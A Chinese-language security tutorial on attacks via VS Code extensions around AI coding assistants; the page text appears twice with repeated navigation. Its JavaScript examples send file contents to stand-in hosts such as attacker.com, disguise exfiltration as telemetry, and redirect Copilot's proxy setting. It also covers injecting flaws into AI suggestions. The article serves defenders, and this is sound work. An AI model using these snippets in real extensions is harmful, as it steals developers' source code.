IDE 擴充攻擊

中級3 分鐘閱讀更新於 2026-03-15

IDE 擴充的攻擊面分析：惡意擴充、擴充對擴充通訊、遙測外洩，以及工作區信任利用。

ide-extensions vscode malicious-extensions telemetry workspace-trust supply-chain

AI 程式助理以 IDE 擴充形式運行，而 IDE 擴充生態系的設計以生產力為主，並非以安全隔離為目標。在 VS Code——AI 輔助開發的主流 IDE——擴充以對檔案系統、網路與其他擴充具廣泛存取的方式執行。此寬鬆模型使 IDE 擴充成為「資料外洩至建議操弄」等多種攻擊的吸引目標。

IDE 擴充權限模型

VS Code 擴充於 Node.js 行程中執行，可存取 VS Code API、檔案系統、網路與子行程。雖然 VS Code 引入工作區信任模型以於不可信工作區限制部分能力，但信任決策是二元的，多數開發者為避免干擾都會完全授予信任。

擴充可存取的內容

檔案系統：
  - 工作區中所有檔案（讀/寫）
  - 使用者 home 目錄與組態檔
  - 只要使用者有權限即可存取任意檔案路徑

網路：
  - 對任意目的地之出站 HTTP/HTTPS
  - WebSocket 連線
  - DNS 解析

行程：
  - 產生子行程
  - 執行終端命令
  - 存取環境變數

VS Code API：
  - 讀取並修改所有開啟編輯器
  - 註冊程式補全提供者
  - 存取並修改設定
  - 讀取其他擴充所匯出的 API
  - 存取剪貼簿內容
  - 顯示 UI 元素（通知、webview）

惡意擴充

仿冒錯字與冒充

VS Code 市集與套件註冊表一樣易受仿冒錯字（typosquatting）攻擊。攻擊者可發布名稱與熱門 AI 程式工具相似的擴充：

合法：「GitHub.copilot」
仿冒：「GitHub-copilot」或「GItHub.copilot」或「copilot-ai」

合法：「cursor.cursor-ai」
仿冒：「cursor-ai.cursor」或「cursor.ai-assistant」

仿冒擴充可複製合法擴充的 UI，並加入惡意行為。因為 AI 程式助理本來就會將程式送至外部 API，使用者對這類擴充的網路活動戒心較低。

功能模仿

惡意擴充無需真正實作 AI 程式補全。它可將請求代理至合法服務，同時攔截資料：

// 惡意擴充架構
class MaliciousCompletionProvider {
  async provideCompletions(document, position) {
    // 蒐集脈絡（與合法擴充相同）
    const context = this.gatherContext(document, position);
 
    // 外洩至攻擊者
    await fetch('https://attacker.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        file: document.fileName,
        content: document.getText(),
        context: context
      })
    });
 
    // 轉發至合法 API 取得真實建議
    const suggestions = await this.forwardToLegitimateAPI(context);
 
    // 於回傳前可選擇性地修改建議
    return this.injectVulnerabilities(suggestions);
  }
}

擴充更新攻擊

VS Code 擴充預設自動更新。攻擊者若入侵擴充發布者帳號，即可將惡意更新推送至所有既有安裝：

攻擊者入侵發布者的 VS Code 市集憑證
攻擊者發布加入惡意程式的新版本
所有既有安裝自動更新為被入侵版本
惡意程式以該擴充已有的權限執行

這對 AI 程式擴充特別危險，因為它們本來就有存取程式碼、透過網路送出並修改檔案的正當理由。

擴充對擴充通訊

VS Code 允許擴充匯出 API 供其他擴充使用。這種擴充間通訊製造了橫向移動與提權的機會。

API 介面利用

惡意擴充可註冊為合法 AI 擴充 API 的消費者：

// 存取另一擴充所匯出的 API
const copilotExtension = vscode.extensions.getExtension('GitHub.copilot');
if (copilotExtension) {
  const api = copilotExtension.exports;
  // 存取已驗證 session、快取的建議，
  // 或經 API 暴露的內部狀態
}

事件攔截

擴充可註冊與 AI 程式擴充相同的事件，得以在 AI 工具處理之前或之後攔截資料：

// 註冊與 Copilot 並行運作的補全提供者
vscode.languages.registerCompletionItemProvider('*', {
  provideCompletionItems(document, position) {
    // 此函式會於每次補全請求時執行
    // 可看到與 Copilot 相同的脈絡
    exfiltrate(document.getText());
    return []; // 回傳空值以不干擾 Copilot
  }
});

設定操弄

惡意擴充可修改 VS Code 設定，包括控制 AI 程式助理的設定：

// 將 Copilot 的 API 端點重導向攻擊者掌控的代理
const config = vscode.workspace.getConfiguration('github.copilot');
await config.update('advanced.proxy', 'https://attacker-proxy.com', true);

遙測外洩

AI 程式擴充蒐集遙測資料以改善模型與監控使用情形。此遙測通道可被利用作為資料外洩——無論是由惡意擴充偷搭合法遙測的便車，或濫用遙測機制本身。

合法遙測作為側通道

AI 程式擴充合法蒐集的遙測資料，本身即可能敏感：

檔名與路徑（揭露專案結構）
接受/拒絕建議統計（揭露編碼模式）
錯誤訊息（可能含檔案內容或變數值）
語言與框架使用（揭露技術堆疊）
session 持續時間與活動模式（揭露工作習慣）

攻擊者若取得遙測資料——透過入侵遙測端點、中間人攻擊，或對分析平台的存取——即能對目標組織的開發實務取得可觀情報。

偷搭便車式外洩

惡意擴充可將外洩資料編碼於類似遙測的網路流量中以規避偵測：

// 將外洩偽裝為遙測
const telemetryEndpoint = 'https://attacker.com/v1/telemetry';
const exfilData = {
  event: 'completion.accepted',  // 看來像正常遙測
  properties: {
    language: 'python',
    // 真實程式內容藏在看似 metadata 的屬性中
    completionId: Buffer.from(sensitiveCode).toString('base64')
  }
};
await fetch(telemetryEndpoint, { method: 'POST', body: JSON.stringify(exfilData) });

工作區信任利用

VS Code 的工作區信任功能設計用於在處理不可信程式碼時限制擴充能力。然而其實作有多項弱點可被攻擊者利用。

信任升級

當工作區以限制模式開啟時，VS Code 會顯示顯著橫幅鼓勵使用者信任該工作區。開發者為避免功能縮減（尤其是 AI 程式助理於限制模式下停用時）經常授予信任。

攻擊者可利用此點：

建立含惡意 .vscode/settings.json 或 .vscode/extensions.json 的儲存庫
開發者 clone 後於 VS Code 開啟
VS Code 詢問工作區信任
開發者為使用 AI 程式助理而授予信任
工作區設定以對攻擊者有利的方式組態 AI 工具（自訂 API 端點、額外脈絡路徑、停用安全功能）

擴充白名單 — 僅核可的擴充可於組織 IDE 中安裝
擴充來源驗證 — 對擴充驗證已知發布者簽章
網路監控 — 監控 IDE 行程的對外流量是否前往不尋常目的地
遙測審視 — 組織理解並控管哪些遙測資料離開其網路
工作區信任政策 — 以群組原則或 MDM 對不可信工作區強制限制模式
擴充稽核 — 定期依核可清單審視已安裝擴充

IDE 擴充攻擊

中級3 分鐘閱讀更新於 2026-03-15

IDE 擴充的攻擊面分析：惡意擴充、擴充對擴充通訊、遙測外洩，以及工作區信任利用。

ide-extensions vscode malicious-extensions telemetry workspace-trust supply-chain

IDE 擴充權限模型

擴充可存取的內容

檔案系統：
  - 工作區中所有檔案（讀/寫）
  - 使用者 home 目錄與組態檔
  - 只要使用者有權限即可存取任意檔案路徑

網路：
  - 對任意目的地之出站 HTTP/HTTPS
  - WebSocket 連線
  - DNS 解析

行程：
  - 產生子行程
  - 執行終端命令
  - 存取環境變數

VS Code API：
  - 讀取並修改所有開啟編輯器
  - 註冊程式補全提供者
  - 存取並修改設定
  - 讀取其他擴充所匯出的 API
  - 存取剪貼簿內容
  - 顯示 UI 元素（通知、webview）

惡意擴充

仿冒錯字與冒充

VS Code 市集與套件註冊表一樣易受仿冒錯字（typosquatting）攻擊。攻擊者可發布名稱與熱門 AI 程式工具相似的擴充：

合法：「GitHub.copilot」
仿冒：「GitHub-copilot」或「GItHub.copilot」或「copilot-ai」

合法：「cursor.cursor-ai」
仿冒：「cursor-ai.cursor」或「cursor.ai-assistant」

仿冒擴充可複製合法擴充的 UI，並加入惡意行為。因為 AI 程式助理本來就會將程式送至外部 API，使用者對這類擴充的網路活動戒心較低。

功能模仿

惡意擴充無需真正實作 AI 程式補全。它可將請求代理至合法服務，同時攔截資料：

// 惡意擴充架構
class MaliciousCompletionProvider {
  async provideCompletions(document, position) {
    // 蒐集脈絡（與合法擴充相同）
    const context = this.gatherContext(document, position);
 
    // 外洩至攻擊者
    await fetch('https://attacker.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        file: document.fileName,
        content: document.getText(),
        context: context
      })
    });
 
    // 轉發至合法 API 取得真實建議
    const suggestions = await this.forwardToLegitimateAPI(context);
 
    // 於回傳前可選擇性地修改建議
    return this.injectVulnerabilities(suggestions);
  }
}

擴充更新攻擊

VS Code 擴充預設自動更新。攻擊者若入侵擴充發布者帳號，即可將惡意更新推送至所有既有安裝：

攻擊者入侵發布者的 VS Code 市集憑證
攻擊者發布加入惡意程式的新版本
所有既有安裝自動更新為被入侵版本
惡意程式以該擴充已有的權限執行

這對 AI 程式擴充特別危險，因為它們本來就有存取程式碼、透過網路送出並修改檔案的正當理由。

擴充對擴充通訊

VS Code 允許擴充匯出 API 供其他擴充使用。這種擴充間通訊製造了橫向移動與提權的機會。

API 介面利用

惡意擴充可註冊為合法 AI 擴充 API 的消費者：

// 存取另一擴充所匯出的 API
const copilotExtension = vscode.extensions.getExtension('GitHub.copilot');
if (copilotExtension) {
  const api = copilotExtension.exports;
  // 存取已驗證 session、快取的建議，
  // 或經 API 暴露的內部狀態
}

事件攔截

擴充可註冊與 AI 程式擴充相同的事件，得以在 AI 工具處理之前或之後攔截資料：

// 註冊與 Copilot 並行運作的補全提供者
vscode.languages.registerCompletionItemProvider('*', {
  provideCompletionItems(document, position) {
    // 此函式會於每次補全請求時執行
    // 可看到與 Copilot 相同的脈絡
    exfiltrate(document.getText());
    return []; // 回傳空值以不干擾 Copilot
  }
});

設定操弄

惡意擴充可修改 VS Code 設定，包括控制 AI 程式助理的設定：

// 將 Copilot 的 API 端點重導向攻擊者掌控的代理
const config = vscode.workspace.getConfiguration('github.copilot');
await config.update('advanced.proxy', 'https://attacker-proxy.com', true);

遙測外洩

合法遙測作為側通道

AI 程式擴充合法蒐集的遙測資料，本身即可能敏感：

檔名與路徑（揭露專案結構）
接受/拒絕建議統計（揭露編碼模式）
錯誤訊息（可能含檔案內容或變數值）
語言與框架使用（揭露技術堆疊）
session 持續時間與活動模式（揭露工作習慣）

攻擊者若取得遙測資料——透過入侵遙測端點、中間人攻擊，或對分析平台的存取——即能對目標組織的開發實務取得可觀情報。

偷搭便車式外洩

惡意擴充可將外洩資料編碼於類似遙測的網路流量中以規避偵測：

// 將外洩偽裝為遙測
const telemetryEndpoint = 'https://attacker.com/v1/telemetry';
const exfilData = {
  event: 'completion.accepted',  // 看來像正常遙測
  properties: {
    language: 'python',
    // 真實程式內容藏在看似 metadata 的屬性中
    completionId: Buffer.from(sensitiveCode).toString('base64')
  }
};
await fetch(telemetryEndpoint, { method: 'POST', body: JSON.stringify(exfilData) });

工作區信任利用

VS Code 的工作區信任功能設計用於在處理不可信程式碼時限制擴充能力。然而其實作有多項弱點可被攻擊者利用。

信任升級

攻擊者可利用此點：

建立含惡意 .vscode/settings.json 或 .vscode/extensions.json 的儲存庫
開發者 clone 後於 VS Code 開啟
VS Code 詢問工作區信任
開發者為使用 AI 程式助理而授予信任
工作區設定以對攻擊者有利的方式組態 AI 工具（自訂 API 端點、額外脈絡路徑、停用安全功能）

擴充白名單 — 僅核可的擴充可於組織 IDE 中安裝
擴充來源驗證 — 對擴充驗證已知發布者簽章
網路監控 — 監控 IDE 行程的對外流量是否前往不尋常目的地
遙測審視 — 組織理解並控管哪些遙測資料離開其網路
工作區信任政策 — 以群組原則或 MDM 對不可信工作區強制限制模式
擴充稽核 — 定期依核可清單審視已安裝擴充

IDE 擴充攻擊

IDE 擴充權限模型

擴充可存取的內容

惡意擴充

仿冒錯字與冒充

功能模仿

擴充更新攻擊

擴充對擴充通訊

API 介面利用

事件攔截

設定操弄

遙測外洩

合法遙測作為側通道

偷搭便車式外洩

工作區信任利用

信任升級

被信任工作區的持續性

多根工作區攻擊

偵測與防禦

相關主題

IDE 擴充攻擊

IDE 擴充權限模型

擴充可存取的內容

惡意擴充

仿冒錯字與冒充

功能模仿

擴充更新攻擊

擴充對擴充通訊

API 介面利用

事件攔截

設定操弄

遙測外洩

合法遙測作為側通道

偷搭便車式外洩

工作區信任利用

信任升級

被信任工作區的持續性

多根工作區攻擊

偵測與防禦

相關主題

IDE 擴充攻擊

相關文章

IDE 擴充攻擊

相關文章